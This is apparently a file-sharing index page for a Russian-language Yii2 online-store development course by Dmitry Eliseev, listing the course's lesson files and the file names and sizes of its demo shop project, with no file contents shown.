Мастер-класс по разработке интернет-магазина на Yii2. Дмитрий Елисеев

mp4   Hot:27   Size:8.92 GB   Created:2017-08-28 16:30:47   Update:2017-10-22 19:04:52  

File List

  • yii2-demo-shop-master/common/tests/_data/.gitkeep 0 B
    yii2-demo-shop-master/console/controllers/.gitkeep 0 B
    yii2-demo-shop-master/shop/tests/unit/.gitkeep 0 B
    yii2-demo-shop-master/common/tests/unit/.gitkeep 0 B
    yii2-demo-shop-master/backend/tests/_data/.gitignore 0 B
    yii2-demo-shop-master/console/config/bootstrap.php 6 B
    yii2-demo-shop-master/backend/config/bootstrap.php 6 B
    yii2-demo-shop-master/frontend/config/bootstrap.php 6 B
    yii2-demo-shop-master/api/config/bootstrap.php 6 B
    yii2-demo-shop-master/static/.gitignore 7 B
    yii2-demo-shop-master/api/tests/_support/.gitignore 11 B
    yii2-demo-shop-master/backend/tests/_support/.gitignore 11 B
    yii2-demo-shop-master/shop/tests/_support/.gitignore 11 B
    yii2-demo-shop-master/common/tests/_support/.gitignore 11 B
    yii2-demo-shop-master/frontend/tests/_support/.gitignore 11 B
    yii2-demo-shop-master/backend/runtime/.gitignore 13 B
    yii2-demo-shop-master/frontend/runtime/.gitignore 13 B
    yii2-demo-shop-master/api/runtime/.gitignore 13 B
    yii2-demo-shop-master/console/runtime/.gitignore 13 B
    yii2-demo-shop-master/common/runtime/.gitignore 13 B
    yii2-demo-shop-master/vagrant/supervisor/log/.gitignore 13 B
    yii2-demo-shop-master/frontend/web/assets/.gitignore 14 B
    yii2-demo-shop-master/api/tests/_output/.gitignore 14 B
    yii2-demo-shop-master/common/tests/_output/.gitignore 14 B
    yii2-demo-shop-master/shop/tests/_output/.gitignore 14 B
    yii2-demo-shop-master/static/cache/.gitignore 14 B
    yii2-demo-shop-master/backend/tests/_output/.gitignore 14 B
    yii2-demo-shop-master/static/origin/.gitignore 14 B
    yii2-demo-shop-master/backend/web/assets/.gitignore 14 B
    yii2-demo-shop-master/frontend/tests/_output/.gitignore 14 B
    yii2-demo-shop-master/environments/prod/backend/config/main-local.php 17 B
    yii2-demo-shop-master/environments/prod/frontend/config/main-local.php 17 B
    yii2-demo-shop-master/environments/prod/api/config/main-local.php 18 B
    yii2-demo-shop-master/environments/prod/api/config/params-local.php 18 B
    yii2-demo-shop-master/environments/prod/backend/config/params-local.php 18 B
    yii2-demo-shop-master/environments/prod/console/config/main-local.php 18 B
    yii2-demo-shop-master/environments/prod/console/config/params-local.php 18 B
    yii2-demo-shop-master/environments/dev/backend/config/params-local.php 18 B
    yii2-demo-shop-master/environments/dev/frontend/config/params-local.php 18 B
    yii2-demo-shop-master/environments/prod/frontend/config/params-local.php 18 B
    yii2-demo-shop-master/environments/dev/api/config/main-local.php 18 B
    yii2-demo-shop-master/environments/dev/console/config/params-local.php 18 B
    yii2-demo-shop-master/environments/dev/api/config/params-local.php 18 B
    yii2-demo-shop-master/backend/tests/unit.suite.yml 23 B
    yii2-demo-shop-master/frontend/web/robots.txt 23 B
    yii2-demo-shop-master/backend/web/robots.txt 26 B
    yii2-demo-shop-master/api/web/robots.txt 26 B
    yii2-demo-shop-master/frontend/web/.gitignore 27 B
    yii2-demo-shop-master/api/web/.gitignore 27 B
    yii2-demo-shop-master/backend/web/.gitignore 27 B
    yii2-demo-shop-master/console/config/.gitignore 31 B
    yii2-demo-shop-master/.bowerrc 37 B
    yii2-demo-shop-master/vagrant/config/.gitignore 39 B
    yii2-demo-shop-master/common/config/.gitignore 47 B
    yii2-demo-shop-master/api/config/test.php 47 B
    yii2-demo-shop-master/api/config/.gitignore 47 B
    yii2-demo-shop-master/backend/config/.gitignore 47 B
    yii2-demo-shop-master/frontend/config/.gitignore 47 B
    yii2-demo-shop-master/README.md 48 B
    yii2-demo-shop-master/console/config/params.php 59 B
    yii2-demo-shop-master/frontend/config/params.php 59 B
    yii2-demo-shop-master/api/config/params.php 59 B
    yii2-demo-shop-master/backend/config/params.php 59 B
    yii2-demo-shop-master/backend/tests/functional.suite.yml 66 B
    Полное руководство по Yii 2.0.txt 67 B
    11/lesson_content.txt 77 B
    yii2-demo-shop-master/frontend/views/site/index.php 78 B
    yii2-demo-shop-master/api/web/docs/swagger-ui.css.map 80 B
    08/lesson_content.txt 85 B
    yii2-demo-shop-master/frontend/tests/functional.suite.yml 87 B
    yii2-demo-shop-master/shop/repositories/NotFoundException.php 90 B
    09/lesson_content.txt 93 B
    yii2-demo-shop-master/shop/tests/unit.suite.yml 105 B
    yii2-demo-shop-master/common/tests/unit.suite.yml 105 B
    yii2-demo-shop-master/environments/dev/console/config/main-local.php 107 B
    yii2-demo-shop-master/shop/access/Rbac.php 107 B
    yii2-demo-shop-master/shop/services/sms/SmsSender.php 108 B
    yii2-demo-shop-master/frontend/tests/unit.suite.yml 120 B
    06/lesson_content.txt 134 B
    yii2-demo-shop-master/shop/entities/AggregateRoot.php 141 B
    03/lesson_content.txt 143 B
    04/lesson_content.txt 144 B
    yii2-demo-shop-master/vagrant/nginx/log/.gitignore 152 B
    yii2-demo-shop-master/shop/helpers/WeightHelper.php 156 B
    yii2-demo-shop-master/common/fixtures/UserFixture.php 158 B
    yii2-demo-shop-master/shop/services/newsletter/Newsletter.php 160 B
    yii2-demo-shop-master/shop/dispatchers/EventDispatcher.php 163 B
    yii2-demo-shop-master/shop/helpers/PriceHelper.php 167 B
    yii2-demo-shop-master/shop/jobs/AsyncEventJob.php 167 B
    yii2-demo-shop-master/api/web/docs/swagger-ui.js.map 170 B
    10/lesson_content.txt 172 B
    yii2-demo-shop-master/shop/repositories/events/EntityRemoved.php 174 B
    yii2-demo-shop-master/shop/repositories/events/EntityPersisted.php 176 B
    yii2-demo-shop-master/shop/readModels/Shop/TagReadRepository.php 178 B
    yii2-demo-shop-master/shop/readModels/Blog/TagReadRepository.php 178 B
    yii2-demo-shop-master/api/helpers/DateHelper.php 179 B
    yii2-demo-shop-master/frontend/tests/acceptance.suite.yml.example 179 B
    07/lesson_content.txt 181 B
    yii2-demo-shop-master/shop/readModels/Shop/BrandReadRepository.php 186 B
    yii2-demo-shop-master/codeception.yml 188 B
    yii2-demo-shop-master/shop/entities/Shop/queries/CategoryQuery.php 188 B
    05/lesson_content.txt 200 B
    yii2-demo-shop-master/shop/entities/Shop/queries/DiscountQuery.php 207 B
    yii2-demo-shop-master/shop/entities/User/events/UserSignUpConfirmed.php 208 B
    yii2-demo-shop-master/shop/entities/User/events/UserSignUpRequested.php 208 B
    yii2-demo-shop-master/api/web/docs/swagger-ui-standalone-preset.js.map 215 B
    yii2-demo-shop-master/frontend/assets/FontAwesomeAsset.php 219 B
    yii2-demo-shop-master/shop/entities/Shop/Order/CustomerData.php 223 B
    yii2-demo-shop-master/api/tests/api/HomeCest.php 227 B
    yii2-demo-shop-master/shop/readModels/Shop/DeliveryMethodReadRepository.php 229 B
    yii2-demo-shop-master/backend/controllers/FileController.php 230 B
    yii2-demo-shop-master/vagrant/supervisor/queue.conf 231 B
    yii2-demo-shop-master/frontend/tests/functional/AboutCest.php 235 B
    yii2-demo-shop-master/shop/entities/Shop/Order/DeliveryData.php 235 B
    yii2-demo-shop-master/environments/dev/api/config/test-local.php 236 B
    yii2-demo-shop-master/environments/dev/backend/config/test-local.php 236 B
    yii2-demo-shop-master/environments/dev/frontend/config/test-local.php 236 B
    yii2-demo-shop-master/frontend/views/blog/post/_list.php 240 B
    yii2-demo-shop-master/shop/validators/SlugValidator.php 245 B
    yii2-demo-shop-master/shop/entities/Shop/Product/events/ProductAppearedInStock.php 245 B
    yii2-demo-shop-master/shop/cart/cost/calculator/CalculatorInterface.php 247 B
    yii2-demo-shop-master/api/tests/api.suite.yml 255 B
    yii2-demo-shop-master/shop/cart/storage/StorageInterface.php 264 B
    yii2-demo-shop-master/frontend/views/layouts/blank.php 266 B
    yii2-demo-shop-master/shop/services/sitemap/IndexItem.php 268 B
    yii2-demo-shop-master/shop/services/yandex/ShopInfo.php 273 B
    yii2-demo-shop-master/shop/forms/auth/ResetPasswordForm.php 274 B
    yii2-demo-shop-master/frontend/web/image/klarna_green_middle.png 278 B
    yii2-demo-shop-master/console/migrations/m170517_081511_rename_user_table.php 278 B
    yii2-demo-shop-master/shop/readModels/Shop/views/CategoryView.php 284 B
    yii2-demo-shop-master/api/codeception.yml 296 B
    yii2-demo-shop-master/backend/views/file/index.php 298 B
    yii2-demo-shop-master/common/codeception.yml 299 B
    yii2-demo-shop-master/backend/codeception.yml 300 B
    yii2-demo-shop-master/frontend/codeception.yml 301 B
    yii2-demo-shop-master/common/mail/auth/signup/confirm-text.php 301 B
    yii2-demo-shop-master/shop/entities/Meta.php 302 B
    yii2-demo-shop-master/shop/codeception.yml 307 B
    yii2-demo-shop-master/environments/prod/common/config/params-local.php 310 B
    yii2-demo-shop-master/environments/dev/common/config/params-local.php 310 B
    yii2-demo-shop-master/shop/forms/Blog/CommentForm.php 312 B
    yii2-demo-shop-master/common/mail/auth/reset/confirm-text.php 313 B
    yii2-demo-shop-master/environments/dev/common/config/test-local.php 313 B
    yii2-demo-shop-master/shop/forms/Shop/Order/CustomerForm.php 313 B
    yii2-demo-shop-master/shop/entities/EventTrait.php 316 B
    yii2-demo-shop-master/frontend/web/favicon.ico 318 B
    yii2-demo-shop-master/backend/config/test.php 318 B
    yii2-demo-shop-master/api/web/favicon.ico 318 B
    yii2-demo-shop-master/shop/cart/cost/calculator/SimpleCost.php 318 B
    yii2-demo-shop-master/backend/web/favicon.ico 318 B
    yii2-demo-shop-master/frontend/config/test.php 319 B
    yii2-demo-shop-master/shop/forms/auth/LoginForm.php 324 B
    yii2-demo-shop-master/frontend/widgets/Blog/CommentView.php 330 B
    yii2-demo-shop-master/frontend/tests/acceptance/_bootstrap.php 333 B
    yii2-demo-shop-master/backend/tests/functional/_bootstrap.php 334 B
    yii2-demo-shop-master/frontend/tests/functional/_bootstrap.php 334 B
    yii2-demo-shop-master/backend/tests/unit/_bootstrap.php 335 B
    yii2-demo-shop-master/api/tests/api/_bootstrap.php 335 B
    yii2-demo-shop-master/frontend/tests/unit/_bootstrap.php 335 B
    yii2-demo-shop-master/vagrant/provision/always-as-root.sh 338 B
    yii2-demo-shop-master/frontend/tests/functional/HomeCest.php 340 B
    yii2-demo-shop-master/common/mail/layouts/text.php 341 B
    yii2-demo-shop-master/console/migrations/m170522_102857_add_shop_product_description_field.php 342 B
    yii2-demo-shop-master/backend/views/page/create.php 343 B
    yii2-demo-shop-master/backend/views/blog/tag/create.php 344 B
    yii2-demo-shop-master/backend/views/shop/tag/create.php 344 B
    yii2-demo-shop-master/console/migrations/m170511_170333_add_user_email_confirm_token.php 347 B
    yii2-demo-shop-master/common/mail/shop/wishlist/available-text.php 347 B
    01/lesson_content.txt 349 B
    yii2-demo-shop-master/backend/views/shop/brand/create.php 352 B
    yii2-demo-shop-master/common/tests/_bootstrap.php 353 B
    yii2-demo-shop-master/frontend/views/blog/post/index.php 354 B
    yii2-demo-shop-master/shop/jobs/AsyncEventJobHandler.php 354 B
    yii2-demo-shop-master/shop/jobs/Job.php 356 B
    02/lesson_content.txt 361 B
    yii2-demo-shop-master/shop/tests/_bootstrap.php 363 B
    yii2-demo-shop-master/backend/views/blog/category/create.php 365 B
    yii2-demo-shop-master/backend/views/shop/category/create.php 365 B
    yii2-demo-shop-master/common/config/bootstrap.php 373 B
    yii2-demo-shop-master/common/config/test.php 376 B
    yii2-demo-shop-master/shop/tests/unit/entities/Shop/Tag/CreateTest.php 380 B
    yii2-demo-shop-master/console/migrations/m170605_082707_add_user_phone_field.php 380 B
    yii2-demo-shop-master/shop/entities/Shop/queries/DeliveryMethodQuery.php 381 B
    yii2-demo-shop-master/backend/views/shop/delivery/create.php 381 B
    yii2-demo-shop-master/shop/entities/Blog/Post/queries/PostQuery.php 387 B
    yii2-demo-shop-master/shop/entities/Shop/Order/Status.php 388 B
    yii2-demo-shop-master/backend/views/shop/characteristic/create.php 388 B
    yii2-demo-shop-master/shop/cart/cost/Discount.php 389 B
    yii2-demo-shop-master/backend/assets/AppAsset.php 390 B
    yii2-demo-shop-master/console/migrations/m170524_085700_add_shop_product_status_field.php 393 B
    yii2-demo-shop-master/backend/bootstrap/SetUp.php 395 B
    yii2-demo-shop-master/shop/tests/unit/forms/ResetPasswordFormTest.php 397 B
    yii2-demo-shop-master/frontend/assets/OwlCarouselAsset.php 401 B
    yii2-demo-shop-master/shop/entities/Shop/Product/queries/ProductQuery.php 402 B
    yii2-demo-shop-master/frontend/widgets/Shop/CartWidget.php 408 B
    yii2-demo-shop-master/console/migrations/m170531_085621_add_blog_post_comments_count_field.php 409 B
    yii2-demo-shop-master/frontend/assets/MagnificPopupAsset.php 409 B
    yii2-demo-shop-master/frontend/web/image/cart.png 421 B
    yii2-demo-shop-master/frontend/tests/acceptance/HomeCest.php 422 B
    yii2-demo-shop-master/api/tests/_bootstrap.php 429 B
    yii2-demo-shop-master/backend/tests/_bootstrap.php 429 B
    yii2-demo-shop-master/frontend/tests/_bootstrap.php 429 B
    yii2-demo-shop-master/frontend/views/shop/catalog/index.php 433 B
    yii2-demo-shop-master/backend/tests/_data/login_data.php 433 B
    yii2-demo-shop-master/frontend/tests/_data/login_data.php 433 B
    yii2-demo-shop-master/shop/tests/_data/login_data.php 433 B
    yii2-demo-shop-master/shop/readModels/Blog/CategoryReadRepository.php 435 B
    yii2-demo-shop-master/backend/views/blog/post/create.php 436 B
    yii2-demo-shop-master/shop/listeners/User/UserSignupConfirmedListener.php 437 B
    yii2-demo-shop-master/shop/readModels/PageReadRepository.php 438 B
    yii2-demo-shop-master/common/mail/auth/signup/confirm-html.php 443 B
    yii2-demo-shop-master/environments/dev/backend/config/main-local.php 444 B
    yii2-demo-shop-master/console/controllers/DocController.php 444 B
    yii2-demo-shop-master/api/web/docs/favicon-16x16.png 445 B
    yii2-demo-shop-master/shop/tests/unit/entities/Shop/Tag/EditTest.php 447 B
    yii2-demo-shop-master/.gitignore 448 B
    yii2-demo-shop-master/api/tests/_data/user.php 452 B
    yii2-demo-shop-master/common/mail/auth/reset/confirm-html.php 453 B
    yii2-demo-shop-master/shop/useCases/cabinet/ProfileService.php 463 B
    yii2-demo-shop-master/api/web/docs/swagger-ui-bundle.js.map 466 B
    yii2-demo-shop-master/frontend/views/blog/post/tag.php 471 B
    yii2-demo-shop-master/shop/services/sms/LoggedSender.php 472 B
    yii2-demo-shop-master/shop/readModels/UserReadRepository.php 477 B
    yii2-demo-shop-master/common/config/params.php 477 B
    yii2-demo-shop-master/common/mail/shop/wishlist/available-html.php 483 B
    yii2-demo-shop-master/backend/controllers/SiteController.php 486 B
    yii2-demo-shop-master/vagrant/config/vagrant-local.example.yml 486 B
    yii2-demo-shop-master/frontend/views/shop/catalog/tag.php 488 B
    yii2-demo-shop-master/backend/views/shop/tag/update.php 489 B
    yii2-demo-shop-master/backend/views/blog/tag/update.php 489 B
    yii2-demo-shop-master/shop/cart/storage/SessionStorage.php 489 B
    yii2-demo-shop-master/backend/views/page/update.php 490 B
    yii2-demo-shop-master/frontend/views/shop/catalog/_subcategories.php 494 B
    yii2-demo-shop-master/frontend/views/layouts/catalog.php 497 B
    yii2-demo-shop-master/frontend/views/layouts/blog.php 497 B
    yii2-demo-shop-master/frontend/views/cabinet/default/index.php 498 B
    yii2-demo-shop-master/backend/views/shop/brand/update.php 507 B
    yii2-demo-shop-master/backend/config/urlManager.php 509 B
    yii2-demo-shop-master/init.bat 511 B
    yii2-demo-shop-master/shop/tests/unit/forms/ContactFormTest.php 513 B
    yii2-demo-shop-master/yii.bat 515 B
    yii2-demo-shop-master/shop/helpers/CharacteristicHelper.php 516 B
    yii2-demo-shop-master/environments/dev/yii_test.bat 520 B
    yii2-demo-shop-master/shop/dispatchers/AsyncEventDispatcher.php 527 B
    yii2-demo-shop-master/shop/listeners/Shop/Category/CategoryPersistenceListener.php 528 B
    yii2-demo-shop-master/shop/forms/ContactForm.php 528 B
    yii2-demo-shop-master/frontend/widgets/Blog/LastPostsWidget.php 531 B
    yii2-demo-shop-master/shop/tests/unit/entities/Shop/Brand/CreateTest.php 532 B
    yii2-demo-shop-master/backend/views/shop/category/update.php 535 B
    yii2-demo-shop-master/backend/views/blog/category/update.php 535 B
    yii2-demo-shop-master/frontend/views/site/error.php 536 B
    yii2-demo-shop-master/shop/entities/Blog/Post/TagAssignment.php 538 B
    yii2-demo-shop-master/frontend/widgets/Shop/FeaturedProductsWidget.php 541 B
    yii2-demo-shop-master/shop/forms/manage/Shop/Product/QuantityForm.php 542 B
    yii2-demo-shop-master/shop/entities/User/WishlistItem.php 543 B
    yii2-demo-shop-master/frontend/assets/AppAsset.php 544 B
    yii2-demo-shop-master/shop/entities/Shop/Product/TagAssignment.php 544 B
    yii2-demo-shop-master/shop/services/RoleManager.php 544 B
    yii2-demo-shop-master/shop/forms/manage/Shop/Product/PhotosForm.php 545 B
    yii2-demo-shop-master/shop/forms/auth/PasswordResetRequestForm.php 547 B
    yii2-demo-shop-master/backend/views/shop/delivery/update.php 549 B
    yii2-demo-shop-master/backend/views/blog/post/update.php 563 B
    yii2-demo-shop-master/shop/entities/Shop/Tag.php 564 B
    yii2-demo-shop-master/shop/entities/Blog/Tag.php 564 B
    yii2-demo-shop-master/shop/forms/manage/Blog/Post/CommentEditForm.php 565 B
    yii2-demo-shop-master/backend/views/shop/modification/create.php 567 B
    yii2-demo-shop-master/shop/readModels/Shop/OrderReadRepository.php 571 B
    yii2-demo-shop-master/shop/forms/manage/Shop/Order/CustomerForm.php 575 B
    yii2-demo-shop-master/shop/entities/Shop/Product/RelatedAssignment.php 576 B
    yii2-demo-shop-master/shop/forms/manage/Shop/Product/ReviewEditForm.php 581 B
    yii2-demo-shop-master/shop/entities/Shop/Product/CategoryAssignment.php 584 B
    yii2-demo-shop-master/shop/repositories/PageRepository.php 585 B
    yii2-demo-shop-master/backend/views/shop/characteristic/update.php 588 B
    yii2-demo-shop-master/console/migrations/m170517_142939_create_tags_table.php 600 B
    yii2-demo-shop-master/shop/useCases/auth/AuthService.php 600 B
    yii2-demo-shop-master/console/migrations/m170530_171508_create_blog_tags_table.php 605 B
    yii2-demo-shop-master/api/tests/_support/ApiTester.php 616 B
    yii2-demo-shop-master/environments/dev/backend/web/index-test.php 617 B
    yii2-demo-shop-master/environments/dev/api/web/index-test.php 617 B
    yii2-demo-shop-master/environments/dev/frontend/web/index-test.php 617 B
    yii2-demo-shop-master/shop/tests/_support/UnitTester.php 619 B
    yii2-demo-shop-master/common/tests/_support/UnitTester.php 621 B
    yii2-demo-shop-master/environments/dev/api/web/index.php 621 B
    yii2-demo-shop-master/environments/dev/frontend/web/index.php 621 B
    yii2-demo-shop-master/environments/dev/backend/web/index.php 621 B
    yii2-demo-shop-master/backend/tests/_support/UnitTester.php 622 B
    yii2-demo-shop-master/environments/prod/backend/web/index.php 623 B
    yii2-demo-shop-master/environments/prod/frontend/web/index.php 623 B
    yii2-demo-shop-master/frontend/tests/_support/UnitTester.php 623 B
    yii2-demo-shop-master/environments/prod/api/web/index.php 623 B
    yii2-demo-shop-master/frontend/views/shop/catalog/brand.php 627 B
    yii2-demo-shop-master/console/migrations/m170529_092357_add_shop_product_fields.php 632 B
    yii2-demo-shop-master/backend/tests/_support/FunctionalTester.php 634 B
    yii2-demo-shop-master/shop/forms/Shop/Order/OrderForm.php 636 B
    yii2-demo-shop-master/shop/tests/unit/entities/Shop/Brand/EditTest.php 637 B
    yii2-demo-shop-master/shop/tests/unit/entities/User/SignupByNetworkTest.php 638 B
    yii2-demo-shop-master/backend/views/layouts/main-login.php 640 B
    yii2-demo-shop-master/console/migrations/m170517_084404_change_users_field_requirements.php 645 B
    yii2-demo-shop-master/shop/forms/manage/MetaForm.php 646 B
    yii2-demo-shop-master/frontend/bootstrap/SetUp.php 646 B
    yii2-demo-shop-master/shop/repositories/Shop/BrandRepository.php 649 B
    yii2-demo-shop-master/shop/services/sitemap/MapItem.php 650 B
    yii2-demo-shop-master/frontend/controllers/SiteController.php 652 B
    yii2-demo-shop-master/shop/repositories/Shop/OrderRepository.php 655 B
    yii2-demo-shop-master/shop/useCases/ContactService.php 656 B
    yii2-demo-shop-master/frontend/controllers/cabinet/DefaultController.php 657 B
    yii2-demo-shop-master/backend/views/shop/tag/_form.php 660 B
    yii2-demo-shop-master/backend/views/blog/tag/_form.php 660 B
    yii2-demo-shop-master/console/migrations/m170531_203900_add_user_roles.php 661 B
    yii2-demo-shop-master/frontend/views/blog/post/_post.php 662 B
    yii2-demo-shop-master/backend/views/shop/modification/update.php 663 B
    yii2-demo-shop-master/shop/forms/Shop/ReviewForm.php 675 B
    yii2-demo-shop-master/shop/services/TransactionManager.php 680 B
    yii2-demo-shop-master/shop/repositories/Blog/CategoryRepository.php 688 B
    yii2-demo-shop-master/console/migrations/m170522_102742_add_shop_product_main_photo_field.php 693 B
    yii2-demo-shop-master/console/migrations/m170529_120617_create_shop_delivery_methods_table.php 697 B
    yii2-demo-shop-master/shop/listeners/Shop/Product/ProductSearchRemoveListener.php 702 B
    yii2-demo-shop-master/common/mail/layouts/html.php 714 B
    yii2-demo-shop-master/console/migrations/m170518_083939_create_shop_brands_table.php 715 B
    yii2-demo-shop-master/console/migrations/m170526_192959_create_shop_discounts_table.php 722 B
    yii2-demo-shop-master/shop/useCases/Blog/CommentService.php 723 B
    yii2-demo-shop-master/shop/forms/manage/Shop/Order/OrderEditForm.php 725 B
    yii2-demo-shop-master/shop/repositories/Shop/TagRepository.php 728 B
    yii2-demo-shop-master/shop/repositories/Blog/TagRepository.php 728 B
    yii2-demo-shop-master/shop/entities/User/Network.php 731 B
    yii2-demo-shop-master/backend/views/shop/modification/_form.php 731 B
    yii2-demo-shop-master/backend/widgets/grid/RoleColumn.php 750 B
    yii2-demo-shop-master/shop/tests/unit/entities/Shop/Category/CreateTest.php 752 B
    yii2-demo-shop-master/shop/forms/User/ProfileEditForm.php 753 B
    yii2-demo-shop-master/shop/tests/unit/entities/User/SignupTest.php 759 B
    yii2-demo-shop-master/shop/forms/manage/Shop/Product/PriceForm.php 759 B
    yii2-demo-shop-master/shop/listeners/User/UserSignupRequestedListener.php 761 B
    yii2-demo-shop-master/shop/repositories/Shop/CharacteristicRepository.php 766 B
    yii2-demo-shop-master/shop/forms/manage/Shop/Product/ModificationForm.php 770 B
    yii2-demo-shop-master/shop/tests/unit/entities/User/ConfirmSignupTest.php 781 B
    yii2-demo-shop-master/shop/repositories/Blog/PostRepository.php 781 B
    yii2-demo-shop-master/console/migrations/m170531_203800_change_auth_assignments_table.php 789 B
    yii2-demo-shop-master/vagrant/provision/once-as-vagrant.sh 805 B
    yii2-demo-shop-master/environments/dev/frontend/config/main-local.php 806 B
    yii2-demo-shop-master/shop/forms/manage/User/UserCreateForm.php 807 B
    yii2-demo-shop-master/frontend/tests/_support/FunctionalTester.php 811 B
    yii2-demo-shop-master/console/migrations/m170519_085957_create_shop_characteristics_table.php 813 B
    yii2-demo-shop-master/console/migrations/m170530_172725_create_blog_categories_table.php 814 B
    yii2-demo-shop-master/environments/dev/yii_test 816 B
    yii2-demo-shop-master/shop/forms/manage/Blog/TagForm.php 819 B
    yii2-demo-shop-master/shop/forms/manage/Shop/TagForm.php 819 B
    yii2-demo-shop-master/shop/tests/unit/entities/User/RequestSignupTest.php 825 B
    yii2-demo-shop-master/shop/cart/cost/Cost.php 829 B
    yii2-demo-shop-master/console/migrations/m170519_192739_create_shop_photos_table.php 829 B
    yii2-demo-shop-master/shop/useCases/manage/Blog/TagManageService.php 833 B
    yii2-demo-shop-master/shop/useCases/manage/Shop/TagManageService.php 833 B
    yii2-demo-shop-master/common/config/main.php 836 B
    yii2-demo-shop-master/shop/repositories/Shop/DeliveryMethodRepository.php 845 B
    yii2-demo-shop-master/backend/views/shop/delivery/_form.php 845 B
    yii2-demo-shop-master/backend/tests/functional/LoginCest.php 846 B
    yii2-demo-shop-master/shop/listeners/Shop/Product/ProductSearchPersistListener.php 847 B
    yii2-demo-shop-master/shop/useCases/cabinet/WishlistService.php 847 B
    yii2-demo-shop-master/shop/tests/_data/user.php 847 B
    yii2-demo-shop-master/frontend/tests/_data/user.php 847 B
    yii2-demo-shop-master/frontend/views/auth/reset/confirm.php 850 B
    yii2-demo-shop-master/frontend/controllers/PageController.php 857 B
    yii2-demo-shop-master/shop/useCases/manage/Blog/CommentManageService.php 862 B
    yii2-demo-shop-master/shop/cart/cost/calculator/DynamicCost.php 864 B
    yii2-demo-shop-master/environments/dev/yii 865 B
    yii2-demo-shop-master/environments/prod/yii 867 B
    yii2-demo-shop-master/shop/tests/unit/entities/Shop/Characteristic/CreateTest.php 894 B
    yii2-demo-shop-master/shop/useCases/auth/NetworkService.php 900 B
    yii2-demo-shop-master/backend/views/user/create.php 913 B
    yii2-demo-shop-master/frontend/views/cabinet/profile/edit.php 913 B
    yii2-demo-shop-master/frontend/views/auth/reset/request.php 914 B
    yii2-demo-shop-master/shop/services/newsletter/MailChimp.php 917 B
    yii2-demo-shop-master/shop/readModels/Shop/SimpleActiveDataProvider.php 926 B
    yii2-demo-shop-master/shop/tests/unit/forms/LoginFormTest.php 928 B
    yii2-demo-shop-master/console/migrations/m170519_212444_create_shop_reviews_table.php 933 B
    yii2-demo-shop-master/console/migrations/m170517_083024_create_user_networks_table.php 938 B
    yii2-demo-shop-master/environments/prod/common/config/main-local.php 945 B
    yii2-demo-shop-master/backend/views/shop/product/quantity.php 953 B
    yii2-demo-shop-master/shop/forms/manage/Shop/DeliveryMethodForm.php 961 B
    yii2-demo-shop-master/shop/helpers/UserHelper.php 963 B
    yii2-demo-shop-master/backend/views/user/update.php 970 B
    yii2-demo-shop-master/frontend/views/page/view.php 974 B
    yii2-demo-shop-master/shop/dispatchers/SimpleEventDispatcher.php 977 B
    yii2-demo-shop-master/shop/useCases/Shop/CartService.php 979 B
    yii2-demo-shop-master/frontend/web/image/eway_creditcard_jcb.png 983 B
    yii2-demo-shop-master/shop/helpers/PostHelper.php 989 B
    yii2-demo-shop-master/shop/helpers/ProductHelper.php 992 B
    yii2-demo-shop-master/backend/views/blog/tag/view.php 993 B
    yii2-demo-shop-master/backend/views/shop/tag/view.php 993 B
    yii2-demo-shop-master/backend/views/shop/characteristic/_form.php 994 B
    yii2-demo-shop-master/frontend/views/blog/post/comment.php 1003 B
    yii2-demo-shop-master/shop/dispatchers/DeferredEventDispatcher.php 1005 B
    yii2-demo-shop-master/shop/forms/auth/SignupForm.php 1007 B
    yii2-demo-shop-master/frontend/widgets/Blog/CategoriesWidget.php 1008 B
    yii2-demo-shop-master/console/controllers/SearchController.php 1015 B
    yii2-demo-shop-master/shop/forms/manage/Blog/Post/TagsForm.php 1020 B
    yii2-demo-shop-master/shop/forms/Shop/Order/DeliveryForm.php 1022 B
    yii2-demo-shop-master/shop/entities/Shop/Brand.php 1 KB
    yii2-demo-shop-master/backend/views/shop/product/price.php 1 KB
    yii2-demo-shop-master/frontend/controllers/MarketController.php 1.01 KB
    yii2-demo-shop-master/backend/forms/Shop/OrderSearch.php 1.01 KB
    yii2-demo-shop-master/backend/views/blog/comment/update.php 1.02 KB
    yii2-demo-shop-master/console/migrations/m170531_081128_create_blog_posts_table.php 1.02 KB
    yii2-demo-shop-master/backend/forms/Shop/DeliveryMethodSearch.php 1.04 KB
    yii2-demo-shop-master/frontend/views/auth/signup/request.php 1.06 KB
    yii2-demo-shop-master/console/migrations/m170531_133531_create_pages_table.php 1.06 KB
    yii2-demo-shop-master/backend/views/shop/brand/_form.php 1.07 KB
    yii2-demo-shop-master/shop/repositories/Shop/CategoryRepository.php 1.07 KB
    yii2-demo-shop-master/backend/views/shop/delivery/view.php 1.07 KB
    yii2-demo-shop-master/shop/forms/Shop/AddToCartForm.php 1.09 KB
    yii2-demo-shop-master/backend/forms/Blog/TagSearch.php 1.09 KB
    yii2-demo-shop-master/backend/forms/Shop/TagSearch.php 1.09 KB
    yii2-demo-shop-master/backend/views/layouts/main.php 1.09 KB
    yii2-demo-shop-master/backend/forms/Shop/BrandSearch.php 1.09 KB
    yii2-demo-shop-master/frontend/controllers/ContactController.php 1.1 KB
    yii2-demo-shop-master/console/migrations/m130524_201442_init.php 1.1 KB
    yii2-demo-shop-master/shop/forms/manage/Shop/BrandForm.php 1.1 KB
    yii2-demo-shop-master/frontend/widgets/Blog/views/comments/_comment.php 1.11 KB
    yii2-demo-shop-master/shop/forms/manage/Shop/Product/TagsForm.php 1.11 KB
    yii2-demo-shop-master/api/web/docs/favicon-32x32.png 1.11 KB
    yii2-demo-shop-master/console/controllers/RoleController.php 1.11 KB
    yii2-demo-shop-master/shop/entities/Shop/Product/Value.php 1.12 KB
    yii2-demo-shop-master/frontend/views/shop/cart/add.php 1.12 KB
    yii2-demo-shop-master/console/migrations/m170519_212344_create_shop_modifications_table.php 1.12 KB
    yii2-demo-shop-master/shop/useCases/manage/Shop/DeliveryMethodManageService.php 1.13 KB
    yii2-demo-shop-master/shop/useCases/manage/Shop/ReviewManageService.php 1.13 KB
    yii2-demo-shop-master/shop/forms/manage/Shop/Order/DeliveryForm.php 1.13 KB
    yii2-demo-shop-master/shop/services/sms/SmsRu.php 1.13 KB
    yii2-demo-shop-master/backend/views/shop/tag/index.php 1.13 KB
    yii2-demo-shop-master/backend/views/blog/tag/index.php 1.13 KB
    yii2-demo-shop-master/console/migrations/m170531_084120_create_blog_tag_assignments_table.php 1.13 KB
    yii2-demo-shop-master/frontend/views/layouts/cabinet.php 1.14 KB
    yii2-demo-shop-master/frontend/widgets/Blog/views/last-posts.php 1.14 KB
    yii2-demo-shop-master/backend/views/shop/brand/index.php 1.14 KB
    yii2-demo-shop-master/console/migrations/m170526_102653_create_user_wishlist_items_table.php 1.14 KB
